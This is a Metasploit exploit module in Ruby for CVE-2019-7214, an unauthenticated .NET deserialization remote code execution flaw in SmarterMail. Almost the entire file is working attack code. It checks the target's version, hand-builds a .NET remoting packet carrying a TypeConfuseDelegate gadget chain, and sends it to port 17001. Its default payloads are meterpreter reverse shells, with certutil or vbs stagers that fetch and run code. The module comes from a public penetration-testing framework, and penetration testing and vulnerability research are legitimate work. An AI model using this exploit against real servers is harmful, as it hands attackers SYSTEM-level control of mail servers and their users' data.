modules/exploits/windows/http/smartermail_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the SmarterTools SmarterMail
software for version numbers <= 16.x or for build numbers < 6985.
The vulnerable versions and builds expose three .NET remoting endpoints
on port 17001, namely /Servers, /Mail and /Spool. For example, a
typical installation of SmarterMail Build 6970 will have the /Servers
endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where
serialized .NET commands can be sent through a TCP socket connection.
The three endpoints perform deserialization of untrusted data
(CVE-2019-7214), allowing an attacker to send arbitrary commands
to be deserialized and executed. This module exploits this vulnerability
to perform .NET deserialization attacks, allowing remote code execution
for any unauthenticated user under the context of the SYSTEM account.
Successful exploitation results in full administrative control of the
target server under the NT AUTHORITY\SYSTEM account.
This vulnerability was patched in Build 6985, where the 17001 port is
no longer publicly accessible, although it can be accessible locally
at 127.0.0.1:17001. Hence, this would still allow for a privilege
escalation vector if the server is compromised as a low-privileged user.
},
'License' => MSF_LICENSE,
'Author' => [
'Soroush Dalili', # Original discovery and PoC
'1F98D', # ExploitDB author
'Ismail E. Dawoodjee' # Metasploit module author
],
'References' => [
[ 'CVE', '2019-7214' ],
[ 'EDB', '49216' ],
[ 'URL', 'https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/' ]
],
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' => [
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'
}
}
],
[
'x86/x64 Windows CmdStager',
{
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_cmdstager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
'CmdStagerFlavor' => 'vbs'
},
'CmdStagerFlavor' => %w[vbs certutil]
}
]
],
'Privileged' => false,
'DisclosureDate' => '2019-04-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(9998, true, 'SmarterMail default HTTP port'),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptInt.new('TCP_PORT', [true, 'SmarterMail default .NET remoting port', 17001]),
OptString.new(
'ENDPOINT', [
true,
'Choose one of three exposed endpoints: Servers, Spool, and Mail. Example - tcp://127.0.0.1:17001/Servers',
'Servers'
]
)
]
)
end
def check
print_status('Checking target web server for a response...')
res = send_request_cgi!({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
if res
body = res.body
else
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.code == 200 && body.downcase.include?('smartermail')
return CheckCode::Unknown('Target is not running SmarterMail.')
end
print_good('Target is running SmarterMail.')
print_status('Checking SmarterMail product build...')
product_build = body.match('stProductBuild.*\s\(')
build_number = product_build.to_s.scan(/\d+/)[0] if product_build
if product_build
print_good("Target is running SmarterMail Build #{build_number}.")
else
print_warning('Product build not found. 16.x versions and below do not have a build number.')
end
if product_build && Rex::Version.new(build_number) < Rex::Version.new('6985')
return CheckCode::Appears
end
print_status('Checking SmarterMail product version...')
product_version = body.match('stProductVersion.*')
version_number = product_version.to_s.split('"')[1] if product_version
unless product_version
return CheckCode::Detected('SmarterMail product version cannot be determined.')
end
print_good("Target is running SmarterMail Version #{version_number}.")
if Rex::Version.new(version_number) <= Rex::Version.new('16.3.6989.16341')
return CheckCode::Appears
end
return CheckCode::Safe
end
def execute_command(cmd, _opts = {})
uri = "tcp://#{datastore['RHOST']}:#{datastore['TCP_PORT']}/#{datastore['ENDPOINT']}"
serialized = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :TypeConfuseDelegate,
formatter: :BinaryFormatter
)
preamble = '.NET'.unpack('C*') # Header
preamble += [0x01] # Version Major
preamble += [0x00] # Version Minor
preamble += [0x00, 0x00] # Operation Type
preamble += [0x00, 0x00] # Content Distribution
preamble += [serialized.length].pack('I').unpack('C*') # Serialized Data Length
preamble += [0x04, 0x00] # URI Header
preamble += [0x01] # Data Type
preamble += [0x01] # Encoding - UTF8
preamble += [uri.length].pack('I').unpack('C*') # URI Length
preamble += uri.unpack('C*') # URI
preamble += [0x00, 0x00] # Terminating Header
data = preamble + serialized.unpack('C*') # Data to Send
final_payload = data.pack('C*')
begin
sock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['TCP_PORT'],
'Proxies' => datastore['Proxies'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
)
sock.write(final_payload)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
print_error("Failed: #{e.class} - #{e.message}")
elog(e)
ensure
sock.close if sock
end
end
def exploit
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :windows_cmdstager
execute_cmdstager
end
end
end